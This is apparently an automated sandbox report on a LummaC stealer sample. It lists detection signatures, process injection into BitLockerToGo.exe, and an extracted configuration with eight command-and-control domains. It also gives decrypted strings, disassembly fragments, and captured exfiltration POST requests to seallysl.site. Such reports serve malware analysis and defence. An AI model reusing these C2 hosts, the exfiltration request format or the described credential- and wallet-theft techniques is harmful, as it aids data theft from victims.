Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1544781
MD5:	3a408188540d593a618c37ff3b9fa378
SHA1:	7298ef70541efda3185b81dbfada7f8c1998e75c
SHA256:	883170fb01d121dd32d3de0c16f987429da0cf1d137e3ce6a92fef44947ae53a
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 3796 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3A408188540D593A618C37FF3B9FA378)

BitLockerToGo.exe (PID: 3060 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["authorisev.site", "seallysl.site", "contemteny.site", "faulteyotk.site", "opposezmny.site", "goalyfeastz.site", "servicedny.site", "dilemmadu.site"], "Build id": "MkfS5f--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000003.2470968810.000000000301C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2470652028.000000000301B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2448144010.000000000301B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2484428826.0000000003020000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2485459206.0000000003020000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2502480428.0000000003025000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2500622439.000000000301B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2502274755.0000000003020000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2425522416.000000000288C000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000002.00000003.2484171723.0000000003020000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2502495771.000000000302A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2483985363.000000000301B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3060	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3060	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3060	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 11 entries

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T18:39:33.609183+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49824	172.67.180.76	443	TCP
2024-10-29T18:39:34.828400+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49834	172.67.180.76	443	TCP
2024-10-29T18:39:47.096041+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49905	172.67.180.76	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T18:39:33.609183+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49824	172.67.180.76	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T18:39:34.828400+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49834	172.67.180.76	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T18:39:33.187259+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.6	49824	172.67.180.76	443	TCP
2024-10-29T18:39:34.339454+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.6	49834	172.67.180.76	443	TCP
2024-10-29T18:39:35.901236+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.6	49841	172.67.180.76	443	TCP
2024-10-29T18:39:38.145429+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.6	49851	172.67.180.76	443	TCP
2024-10-29T18:39:39.556612+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.6	49862	172.67.180.76	443	TCP
2024-10-29T18:39:41.296508+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.6	49873	172.67.180.76	443	TCP
2024-10-29T18:39:44.119673+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.6	49884	172.67.180.76	443	TCP
2024-10-29T18:39:46.765924+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.6	49905	172.67.180.76	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T18:39:32.467113+0100	2057093	1	Domain Observed Used for C2 Detected	192.168.2.6	53467	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (servicedny .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T18:39:32.417887+0100	2057095	1	Domain Observed Used for C2 Detected	192.168.2.6	52252	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T18:39:37.390281+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49841	172.67.180.76	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.file.exe.25ba000.1.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["authorisev.site", "seallysl.site", "contemteny.site", "faulteyotk.site", "opposezmny.site", "goalyfeastz.site", "servicedny.site", "dilemmadu.site"], "Build id": "MkfS5f--"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: servicedny.site
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: authorisev.site
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: faulteyotk.site
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: dilemmadu.site
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: contemteny.site
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: goalyfeastz.site
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: opposezmny.site
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: seallysl.site
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: servicedny.site
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: MkfS5f--

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_0041D5AF CryptUnprotectData,

2_2_0041D5AF

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.6:49905 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]	2_2_00410118
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], dl	2_2_00410118
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]	2_2_00410118
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	2_2_00410118
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	2_2_00410118
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]	2_2_00410130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], dl	2_2_00410130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]	2_2_00410130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	2_2_00410130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	2_2_00410130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	2_2_004441F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	2_2_0044137E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	2_2_004413D5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	2_2_0041D5AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, eax	2_2_0043A97E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [eax+ebx*8], 7CDE1E50h	2_2_0043A97E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h	2_2_0043A97E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], cl	2_2_0042EB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	2_2_0042EB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then lea edx, dword ptr [eax-80h]	2_2_0042EB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]	2_2_0042EB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]	2_2_0042EB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	2_2_0042EB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_0042EB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [eax+ebx], 30303030h	2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [eax+ebx], 20202020h	2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h	2_2_0043B170
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	2_2_004431D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	2_2_004431D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h]	2_2_004241E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	2_2_00442EB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	2_2_00442EB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	2_2_004432C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	2_2_004432C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [eax+ebx], 00000030h	2_2_004012D5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, ebx	2_2_00421333
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	2_2_00444380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	2_2_004433B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	2_2_004433B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_0042E400
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]	2_2_0042F4DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]	2_2_0042F4DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	2_2_0042F4DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_0042F4DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, eax	2_2_0040D500
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ebx], ax	2_2_0041F510
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0041F510
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-67BC38F0h]	2_2_00441648
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	2_2_0043C6D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0041C6E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+52B71DE2h]	2_2_00441720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	2_2_00443720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h]	2_2_0043F7E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_0042E870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+ebx]	2_2_00405820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0041C8CE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	2_2_0040E8D6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+esi]	2_2_0040C960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	2_2_0040E996
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	2_2_0042AA40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch]	2_2_0042AA60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0042CA72
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0042CA72
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh]	2_2_0043FAD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, edx	2_2_00421B40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp al, 2Eh	2_2_0042AC04
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, esi	2_2_0041ECDE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00437CA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_0042DE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], 595A5B84h	2_2_00440E3A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, dword ptr [esp+54h]	2_2_0042CEDA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	2_2_00442EB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	2_2_00442EB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_00425F00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, word ptr [edx]	2_2_00428F00

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.6:49841 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057093 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site) : 192.168.2.6:53467 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.6:49851 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057095 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (servicedny .site) : 192.168.2.6:52252 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.6:49824 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.6:49834 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.6:49873 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.6:49862 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.6:49905 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.6:49884 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49834 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49834 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49824 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49824 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49841 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49905 -> 172.67.180.76:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: authorisev.site
Source: Malware configuration extractor	URLs: seallysl.site
Source: Malware configuration extractor	URLs: contemteny.site
Source: Malware configuration extractor	URLs: faulteyotk.site
Source: Malware configuration extractor	URLs: opposezmny.site
Source: Malware configuration extractor	URLs: goalyfeastz.site
Source: Malware configuration extractor	URLs: servicedny.site
Source: Malware configuration extractor	URLs: dilemmadu.site

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1247Host: seallysl.site
